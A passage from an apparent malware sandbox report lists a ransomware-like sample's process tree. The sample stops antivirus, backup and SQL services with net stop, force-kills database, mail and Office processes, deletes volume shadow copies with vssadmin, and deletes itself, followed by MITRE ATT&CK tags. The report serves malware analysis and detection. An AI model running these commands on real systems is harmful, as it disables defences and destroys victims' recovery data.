    C:\Windows\system32\net1 stop "ReportServer$TPS" /y
    3⤵
    PID:588
- C:\Windows\SysWOW64\net.exe
  net stop "ReportServer$TPSAMA" /y
  2⤵
  PID:2000
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "ReportServer$TPSAMA" /y
    3⤵
    PID:1564
- C:\Windows\SysWOW64\net.exe
  net stop "RESvc" /y
  2⤵
  PID:1596
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "RESvc" /y
    3⤵
    PID:2656
- C:\Windows\SysWOW64\net.exe
  net stop "sacsvr" /y
  2⤵
  PID:2632
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "sacsvr" /y
    3⤵
    PID:2536
- C:\Windows\SysWOW64\net.exe
  net stop "SamSs" /y
  2⤵
  PID:2500
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "SamSs" /y
    3⤵
    PID:1768
- C:\Windows\SysWOW64\net.exe
  net stop "SAVAdminService" /y
  2⤵
  PID:688
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "SAVAdminService" /y
    3⤵
    PID:2032
- C:\Windows\SysWOW64\net.exe
  net stop "SAVService" /y
  2⤵
  PID:1620
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "SAVService" /y
    3⤵
    PID:812
- C:\Windows\SysWOW64\net.exe
  net stop "SDRSVC" /y
  2⤵
  PID:1752
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "SDRSVC" /y
    3⤵
    PID:2292
- C:\Windows\SysWOW64\net.exe
  net stop "SepMasterService" /y
  2⤵
  PID:2116
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "SepMasterService" /y
    3⤵
    PID:396
- C:\Windows\SysWOW64\net.exe
  net stop "ShMonitor" /y
  2⤵
  PID:1800
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "ShMonitor" /y
    3⤵
    PID:1644
- C:\Windows\SysWOW64\net.exe
  net stop "Smcinst" /y
  2⤵
  PID:2688
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "Smcinst" /y
    3⤵
    PID:1312
- C:\Windows\SysWOW64\net.exe
  net stop "SmcService" /y
  2⤵
  PID:912
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "SmcService" /y
    3⤵
    PID:540
- C:\Windows\SysWOW64\net.exe
  net stop "SMTPSvc" /y
  2⤵
  PID:2240
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "SMTPSvc" /y
    3⤵
    PID:2624
- C:\Windows\SysWOW64\net.exe
  net stop "SNAC" /y
  2⤵
  PID:3060
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "SNAC" /y
    3⤵
    PID:2860
- C:\Windows\SysWOW64\net.exe
  net stop "SntpService" /y
  2⤵
  PID:1628
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "SntpService" /y
    3⤵
    PID:952
- C:\Windows\SysWOW64\net.exe
  net stop "sophossps" /y
  2⤵
  PID:2792
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "sophossps" /y
    3⤵
    PID:2312
- C:\Windows\SysWOW64\net.exe
  net stop "SQLAgent$BKUPEXEC" /y
  2⤵
  PID:2956
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "SQLAgent$BKUPEXEC" /y
    3⤵
    PID:984
- C:\Windows\SysWOW64\net.exe
  net stop "SQLAgent$ECWDB2" /y
  2⤵
  PID:1968
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "SQLAgent$ECWDB2" /y
    3⤵
    PID:1180
- C:\Windows\SysWOW64\net.exe
  net stop "SQLAgent$PRACTTICEBGC" /y
  2⤵
  PID:888
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "SQLAgent$PRACTTICEBGC" /y
    3⤵
    PID:1592
- C:\Windows\SysWOW64\net.exe
  net stop "SQLAgent$PRACTTICEMGT" /y
  2⤵
  PID:3004
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "SQLAgent$PRACTTICEMGT" /y
    3⤵
    PID:860
- C:\Windows\SysWOW64\net.exe
  net stop "SQLAgent$PROFXENGAGEMENT" /y
  2⤵
  PID:1756
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "SQLAgent$PROFXENGAGEMENT" /y
    3⤵
    PID:752
- C:\Windows\SysWOW64\net.exe
  net stop "SQLAgent$SBSMONITORING" /y
  2⤵
  PID:1048
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "SQLAgent$SBSMONITORING" /y
    3⤵
    PID:2268
- C:\Windows\SysWOW64\net.exe
  net stop "SQLAgent$SHAREPOINT" /y
  2⤵
  PID:1516
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "SQLAgent$SHAREPOINT" /y
    3⤵
    PID:592
- C:\Windows\SysWOW64\net.exe
  net stop "SQLAgent$SQL_2008" /y
  2⤵
  PID:1880
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "SQLAgent$SQL_2008" /y
    3⤵
    PID:2288
- C:\Windows\SysWOW64\net.exe
  net stop "SQLAgent$SYSTEM_BGC" /y
  2⤵
  PID:1972
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "SQLAgent$SYSTEM_BGC" /y
    3⤵
    PID:2644
- C:\Windows\SysWOW64\net.exe
  net stop "SQLAgent$TPS" /y
  2⤵
  PID:2600
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "SQLAgent$TPS" /y
    3⤵
    PID:2904
- C:\Windows\SysWOW64\net.exe
  net stop "SQLAgent$TPSAMA" /y
  2⤵
  PID:2684
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "SQLAgent$TPSAMA" /y
    3⤵
    PID:3080
- C:\Windows\SysWOW64\net.exe
  net stop "SQLAgent$VEEAMSQL2008R2" /y
  2⤵
  PID:3088
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "SQLAgent$VEEAMSQL2008R2" /y
    3⤵
    PID:3108
- C:\Windows\SysWOW64\net.exe
  net stop "SQLAgent$VEEAMSQL2012" /y
  2⤵
  PID:3116
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "SQLAgent$VEEAMSQL2012" /y
    3⤵
    PID:3136
- C:\Windows\SysWOW64\net.exe
  net stop "SQLBrowser" /y
  2⤵
  PID:3144
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "SQLBrowser" /y
    3⤵
    PID:3164
- C:\Windows\SysWOW64\net.exe
  net stop "SQLSafeOLRService" /y
  2⤵
  PID:3172
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "SQLSafeOLRService" /y
    3⤵
    PID:3192
- C:\Windows\SysWOW64\net.exe
  net stop "SQLSERVERAGENT" /y
  2⤵
  PID:3200
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "SQLSERVERAGENT" /y
    3⤵
    PID:3220
- C:\Windows\SysWOW64\net.exe
  net stop "SQLTELEMETRY" /y
  2⤵
  PID:3228
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "SQLTELEMETRY" /y
    3⤵
    PID:3248
- C:\Windows\SysWOW64\net.exe
  net stop "SQLTELEMETRY$ECWDB2" /y
  2⤵
  PID:3256
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "SQLTELEMETRY$ECWDB2" /y
    3⤵
    PID:3276
- C:\Windows\SysWOW64\net.exe
  net stop "SQLWriter" /y
  2⤵
  PID:3284
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "SQLWriter" /y
    3⤵
    PID:3304
- C:\Windows\SysWOW64\net.exe
  net stop "SstpSvc" /y
  2⤵
  PID:3312
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "SstpSvc" /y
    3⤵
    PID:3332
- C:\Windows\SysWOW64\net.exe
  net stop "svcGenericHost" /y
  2⤵
  PID:3340
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "svcGenericHost" /y
    3⤵
    PID:3360
- C:\Windows\SysWOW64\net.exe
  net stop "swi_filter" /y
  2⤵
  PID:3372
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "swi_filter" /y
    3⤵
    PID:3392
- C:\Windows\SysWOW64\net.exe
  net stop "swi_service" /y
  2⤵
  PID:3400
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "swi_service" /y
    3⤵
    PID:3420
- C:\Windows\SysWOW64\net.exe
  net stop "swi_update_64" /y
  2⤵
  PID:3428
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "swi_update_64" /y
    3⤵
    PID:3448
- C:\Windows\SysWOW64\net.exe
  net stop "TmCCSF" /y
  2⤵
  PID:3456
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "TmCCSF" /y
    3⤵
    PID:3476
- C:\Windows\SysWOW64\net.exe
  net stop "tmlisten" /y
  2⤵
  PID:3484
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "tmlisten" /y
    3⤵
    PID:3504
- C:\Windows\SysWOW64\net.exe
  net stop "TrueKey" /y
  2⤵
  PID:3512
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "TrueKey" /y
    3⤵
    PID:3532
- C:\Windows\SysWOW64\net.exe
  net stop "TrueKeyScheduler" /y
  2⤵
  PID:3540
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "TrueKeyScheduler" /y
    3⤵
    PID:3560
- C:\Windows\SysWOW64\net.exe
  net stop "TrueKeyServiceHelper" /y
  2⤵
  PID:3568
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "TrueKeyServiceHelper" /y
    3⤵
    PID:3588
- C:\Windows\SysWOW64\net.exe
  net stop "UI0Detect" /y
  2⤵
  PID:3596
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "UI0Detect" /y
    3⤵
    PID:3616
- C:\Windows\SysWOW64\net.exe
  net stop "VeeamBackupSvc" /y
  2⤵
  PID:3624
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "VeeamBackupSvc" /y
    3⤵
    PID:3644
- C:\Windows\SysWOW64\net.exe
  net stop "VeeamBrokerSvc" /y
  2⤵
  PID:3652
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "VeeamBrokerSvc" /y
    3⤵
    PID:3672
- C:\Windows\SysWOW64\net.exe
  net stop "VeeamCatalogSvc" /y
  2⤵
  PID:3680
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "VeeamCatalogSvc" /y
    3⤵
    PID:3700
- C:\Windows\SysWOW64\net.exe
  net stop "VeeamCloudSvc" /y
  2⤵
  PID:3708
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "VeeamCloudSvc" /y
    3⤵
    PID:3728
- C:\Windows\SysWOW64\net.exe
  net stop "VeeamDeploymentService" /y
  2⤵
  PID:3736
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "VeeamDeploymentService" /y
    3⤵
    PID:3756
- C:\Windows\SysWOW64\net.exe
  net stop "VeeamDeploySvc" /y
  2⤵
  PID:3768
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "VeeamDeploySvc" /y
    3⤵
    PID:3788
- C:\Windows\SysWOW64\net.exe
  net stop "VeeamEnterpriseManagerSvc" /y
  2⤵
  PID:3796
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "VeeamEnterpriseManagerSvc" /y
    3⤵
    PID:3816
- C:\Windows\SysWOW64\net.exe
  net stop "VeeamMountSvc" /y
  2⤵
  PID:3824
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "VeeamMountSvc" /y
    3⤵
    PID:3844
- C:\Windows\SysWOW64\net.exe
  net stop "VeeamNFSSvc" /y
  2⤵
  PID:3852
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "VeeamNFSSvc" /y
    3⤵
    PID:3872
- C:\Windows\SysWOW64\net.exe
  net stop "VeeamRESTSvc" /y
  2⤵
  PID:3880
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "VeeamRESTSvc" /y
    3⤵
    PID:3900
- C:\Windows\SysWOW64\net.exe
  net stop "VeeamTransportSvc" /y
  2⤵
  PID:3908
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "VeeamTransportSvc" /y
    3⤵
    PID:3928
- C:\Windows\SysWOW64\net.exe
  net stop "W3Svc" /y
  2⤵
  PID:3936
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "W3Svc" /y
    3⤵
    PID:3956
- C:\Windows\SysWOW64\net.exe
  net stop "wbengine" /y
  2⤵
  PID:3964
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "wbengine" /y
    3⤵
    PID:3984
- C:\Windows\SysWOW64\net.exe
  net stop "WRSVC" /y
  2⤵
  PID:3992
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "WRSVC" /y
    3⤵
    PID:4012
- C:\Windows\SysWOW64\net.exe
  net stop "MSSQL$VEEAMSQL2008R2" /y
  2⤵
  PID:4020
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "MSSQL$VEEAMSQL2008R2" /y
    3⤵
    PID:4040
- C:\Windows\SysWOW64\net.exe
  net stop "SQLAgent$VEEAMSQL2008R2" /y
  2⤵
  PID:4048
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "SQLAgent$VEEAMSQL2008R2" /y
    3⤵
    PID:4068
- C:\Windows\SysWOW64\net.exe
  net stop "VeeamHvIntegrationSvc" /y
  2⤵
  PID:4076
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "VeeamHvIntegrationSvc" /y
    3⤵
    PID:2460
- C:\Windows\SysWOW64\net.exe
  net stop "swi_update" /y
  2⤵
  PID:3076
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "swi_update" /y
    3⤵
    PID:3128
- C:\Windows\SysWOW64\net.exe
  net stop "SQLAgent$CXDB" /y
  2⤵
  PID:3132
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "SQLAgent$CXDB" /y
    3⤵
    PID:3152
- C:\Windows\SysWOW64\net.exe
  net stop "SQLAgent$CITRIX_METAFRAME" /y
  2⤵
  PID:3196
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "SQLAgent$CITRIX_METAFRAME" /y
    3⤵
    PID:3216
- C:\Windows\SysWOW64\net.exe
  net stop "SQL Backups" /y
  2⤵
  PID:3240
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "SQL Backups" /y
    3⤵
    PID:3268
- C:\Windows\SysWOW64\net.exe
  net stop "MSSQL$PROD" /y
  2⤵
  PID:3272
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "MSSQL$PROD" /y
    3⤵
    PID:3292
- C:\Windows\SysWOW64\net.exe
  net stop "Zoolz 2 Service" /y
  2⤵
  PID:3336
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "Zoolz 2 Service" /y
    3⤵
    PID:3356
- C:\Windows\SysWOW64\net.exe
  net stop "MSSQLServerADHelper" /y
  2⤵
  PID:3384
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "MSSQLServerADHelper" /y
    3⤵
    PID:3064
- C:\Windows\SysWOW64\net.exe
  net stop "SQLAgent$PROD" /y
  2⤵
  PID:3416
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "SQLAgent$PROD" /y
    3⤵
    PID:3436
- C:\Windows\SysWOW64\net.exe
  net stop "msftesql$PROD" /y
  2⤵
  PID:3480
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "msftesql$PROD" /y
    3⤵
    PID:3500
- C:\Windows\SysWOW64\net.exe
  net stop "NetMsmqActivator" /y
  2⤵
  PID:3524
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "NetMsmqActivator" /y
    3⤵
    PID:3564
- C:\Windows\SysWOW64\net.exe
  net stop "EhttpSrv" /y
  2⤵
  PID:3548
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "EhttpSrv" /y
    3⤵
    PID:3608
- C:\Windows\SysWOW64\net.exe
  net stop "ekrn" /y
  2⤵
  PID:3612
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "ekrn" /y
    3⤵
    PID:3632
- C:\Windows\SysWOW64\net.exe
  net stop "ESHASRV" /y
  2⤵
  PID:3368
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "ESHASRV" /y
    3⤵
    PID:3704
- C:\Windows\SysWOW64\net.exe
  net stop "MSSQL$SOPHOS" /y
  2⤵
  PID:3688
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "MSSQL$SOPHOS" /y
    3⤵
    PID:3748
- C:\Windows\SysWOW64\net.exe
  net stop "SQLAgent$SOPHOS" /y
  2⤵
  PID:3752
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "SQLAgent$SOPHOS" /y
    3⤵
    PID:3776
- C:\Windows\SysWOW64\net.exe
  net stop "AVP" /y
  2⤵
  PID:3820
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "AVP" /y
    3⤵
    PID:3832
- C:\Windows\SysWOW64\net.exe
  net stop "klnagent" /y
  2⤵
  PID:3876
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "klnagent" /y
    3⤵
    PID:3896
- C:\Windows\SysWOW64\net.exe
  net stop "MSSQL$SQLEXPRESS" /y
  2⤵
  PID:3920
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "MSSQL$SQLEXPRESS" /y
    3⤵
    PID:3960
- C:\Windows\SysWOW64\net.exe
  net stop "SQLAgent$SQLEXPRESS" /y
  2⤵
  PID:3944
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "SQLAgent$SQLEXPRESS" /y
    3⤵
    PID:4004
- C:\Windows\SysWOW64\net.exe
  net stop "wbengine" /y
  2⤵
  PID:4016
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "wbengine" /y
    3⤵
    PID:4036
- C:\Windows\SysWOW64\net.exe
  net stop "kavfsslp" /y
  2⤵
  PID:4060
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "kavfsslp" /y
    3⤵
    PID:3084
- C:\Windows\SysWOW64\net.exe
  net stop "KAVFSGT" /y
  2⤵
  PID:4084
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "KAVFSGT" /y
    3⤵
    PID:3168
- C:\Windows\SysWOW64\net.exe
  net stop "KAVFS" /y
  2⤵
  PID:3160
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "KAVFS" /y
    3⤵
    PID:3180
- C:\Windows\SysWOW64\net.exe
  net stop "mfefire" /y
  2⤵
  PID:3280
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "mfefire" /y
    3⤵
    PID:3300
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /F /IM zoolz.exe /T
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3352
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /F /IM agntsvc.exe /T
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3592
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /F /IM dbeng50.exe /T
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3760
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /F /IM dbsnmp.exe /T
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3804
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /F /IM encsvc.exe /T
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3764
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /F /IM excel.exe /T
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4064
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /F /IM firefoxconfig.exe /T
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3296
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /F /IM infopath.exe /T
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3364
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /F /IM isqlplussvc.exe /T
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3848
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /F /IM msaccess.exe /T
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3916
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /F /IM msftesql.exe /T
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4000
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /F /IM mspub.exe /T
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3320
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /F /IM mydesktopqos.exe /T
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3664
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /F /IM mydesktopservice.exe /T
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3732
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /F /IM mysqld.exe /T
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4044
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /F /IM mysqld-nt.exe /T
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3112
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /F /IM mysqld-opt.exe /T
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3784
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /F /IM ocautoupds.exe /T
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4092
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /F /IM ocomm.exe /T
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3860
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /F /IM ocssd.exe /T
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3452
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /F /IM onenote.exe /T
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4028
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /F /IM oracle.exe /T
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3576
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /F /IM outlook.exe /T
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3836
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /F /IM powerpnt.exe /T
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3308
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /F /IM sqbcoreservice.exe /T
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3692
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /F /IM sqlagent.exe /T
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3840
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /F /IM sqlbrowser.exe /T
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3236
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /F /IM sqlservr.exe /T
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3948
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /F /IM sqlwriter.exe /T
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3208
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /F /IM steam.exe /T
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4104
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /F /IM synctime.exe /T
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4144
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /F /IM tbirdconfig.exe /T
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4184
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /F /IM thebat.exe /T
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4224
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /F /IM thebat64.exe /T
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4264
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /F /IM thunderbird.exe /T
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4304
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /F /IM visio.exe /T
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4344
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /F /IM winword.exe /T
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4388
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /F /IM wordpad.exe /T
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4428
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /F /IM xfssvccon.exe /T
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4468
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /F /IM tmlisten.exe /T
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4508
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /F /IM PccNTMon.exe /T
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4548
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /F /IM CNTAoSMgr.exe /T
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4588
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /F /IM Ntrtscan.exe /T
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4632
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /F /IM mbamtray.exe /T
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4672
- C:\Windows\SysWOW64\vssadmin.exe
  vssadmin Delete Shadows /all /quiet
  2⤵
  - Interacts with shadow copies
  PID:4712
- C:\Windows\SysWOW64\vssadmin.exe
  vssadmin resize shadowstorage /for=C: /on=C: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:4796
- C:\Windows\SysWOW64\vssadmin.exe
  vssadmin resize shadowstorage /for=C: /on=C: /maxsize=unbounded
  2⤵
  - Interacts with shadow copies
  PID:4840
- C:\Windows\SysWOW64\vssadmin.exe
  vssadmin resize shadowstorage /for=F: /on=F: /maxsize=401MB
  2⤵
  - Enumerates connected drives
  - Interacts with shadow copies
  PID:4880
- C:\Windows\SysWOW64\vssadmin.exe
  vssadmin resize shadowstorage /for=F: /on=F: /maxsize=unbounded
  2⤵
  - Enumerates connected drives
  - Interacts with shadow copies
  PID:4924
- C:\Windows\SysWOW64\vssadmin.exe
  vssadmin Delete Shadows /all /quiet
  2⤵
  - Interacts with shadow copies
  PID:4964
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ping localhost -n 3 > nul & del C:\Users\Admin\AppData\Local\Temp\3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe
  2⤵
  PID:5116
- - C:\Windows\SysWOW64\PING.EXE
    ping localhost -n 3
    3⤵
    - Runs ping.exe
    PID:108
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 1916 -s 3956
  2⤵
  - Program crash
  PID:4912

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4748

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Indicator Removal

T1070

File Deletion

T1070.004

Credential Access

Unsecured Credentials

T1552

